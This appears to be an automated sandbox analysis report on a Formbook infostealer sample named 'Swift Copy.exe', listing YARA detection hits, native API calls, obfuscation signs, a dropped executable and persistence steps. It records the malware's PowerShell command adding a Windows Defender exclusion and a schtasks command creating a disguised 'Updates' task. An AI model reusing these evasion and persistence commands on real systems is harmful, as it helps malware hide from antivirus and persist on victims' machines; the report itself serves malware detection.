Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02338400 0_2_02338400
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02336FF8 0_2_02336FF8
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02337330 0_2_02337330
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02338728 0_2_02338728
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_023384A1 0_2_023384A1
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233731E 0_2_0233731E
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233736A 0_2_0233736A
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049CAB90 0_2_049CAB90
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0548 0_2_049C0548
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0EF0 0_2_049C0EF0
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0F00 0_2_049C0F00
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049CAB82 0_2_049CAB82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CF900 8_2_018CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB090 8_2_018DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019920A8 8_2_019920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019928EC 8_2_019928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981002 8_2_01981002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199E824 8_2_0199E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FEBB0 8_2_018FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019803DA 8_2_019803DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198DBD2 8_2_0198DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992B28 8_2_01992B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAB40 8_2_018EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019922AE 8_2_019922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FA2B 8_2_0197FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019925DD 8_2_019925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992D07 8_2_01992D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C0D20 8_2_018C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991D55 8_2_01991D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D841F 8_2_018D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198D466 8_2_0198D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199DFCE 8_2_0199DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991FF1 8_2_01991FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992EF7 8_2_01992EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198D616 8_2_0198D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E6E30 8_2_018E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041FB2A 8_2_0041FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041FBE3 8_2_0041FBE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041F3A5 8_2_0041F3A5
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 018CB150 appears 75 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk, 8_2_019099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01909910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_019098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909840 NtDelayExecution,LdrInitializeThunk, 8_2_01909840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01909860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01909A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A20 NtResumeThread,LdrInitializeThunk, 8_2_01909A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A50 NtCreateFile,LdrInitializeThunk, 8_2_01909A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019095D0 NtClose,LdrInitializeThunk, 8_2_019095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909540 NtReadFile,LdrInitializeThunk, 8_2_01909540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01909780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_019097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01909FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01909710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_019096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01909660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099D0 NtCreateProcessEx, 8_2_019099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909950 NtQueueApcThread, 8_2_01909950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019098A0 NtWriteVirtualMemory, 8_2_019098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909820 NtEnumerateKey, 8_2_01909820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190B040 NtSuspendThread, 8_2_0190B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A3B0 NtGetContextThread, 8_2_0190A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909B00 NtSetValueKey, 8_2_01909B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A80 NtOpenDirectoryObject, 8_2_01909A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A10 NtQuerySection, 8_2_01909A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019095F0 NtQueryInformationFile, 8_2_019095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190AD30 NtSetContextThread, 8_2_0190AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909520 NtWaitForSingleObject, 8_2_01909520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909560 NtWriteFile, 8_2_01909560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A710 NtOpenProcessToken, 8_2_0190A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909730 NtQueryVirtualMemory, 8_2_01909730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A770 NtOpenThread, 8_2_0190A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909770 NtSetInformationFile, 8_2_01909770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909760 NtOpenProcess, 8_2_01909760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019096D0 NtCreateKey, 8_2_019096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909610 NtEnumerateValueKey, 8_2_01909610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909650 NtQueryValueKey, 8_2_01909650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909670 NtQueryInformationProcess, 8_2_01909670
Sample file is different than original file name gathered from version info
Source: Swift Copy.exe, 00000000.00000002.295533138.0000000007180000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295486432.0000000007030000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000003.256962954.0000000006ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295288775.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.284608017.00000000023EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000000.237305228.000000000011A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
Source: Swift Copy.exe Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
Source: Swift Copy.exe Virustotal: Detection: 21%
Source: Swift Copy.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\Swift Copy.exe File read: C:\Users\user\Desktop\Swift Copy.exe Jump to behavior
Source: Swift Copy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Swift Copy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Local\Temp\tmpE16E.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/9@6/5
Source: C:\Users\user\Desktop\Swift Copy.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: Swift Copy.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Swift Copy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Users\user\Desktop\Swift Copy.exe Mutant created: \Sessions\1\BaseNamedObjects\qLSjiKzPfybrIOdxeHK
Source: Swift Copy.exe, u000fu2004.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Swift Copy.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Swift Copy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Swift Copy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Swift Copy.exe, u000fu2004.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233E250 pushad ; ret 0_2_0233E251
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C2057 push ebx; retf 0_2_049C207A
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C7732 push 2400005Eh; retf 0_2_049C7741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0191D0D1 push ecx; ret 8_2_0191D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041F358 push dword ptr [4E772C75h]; ret 8_2_0041F375
Source: initial sample Static PE information: section name: .text entropy: 7.431867015823937
Source: initial sample Static PE information: section name: .text entropy: 7.431867015823937
Drops PE files
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
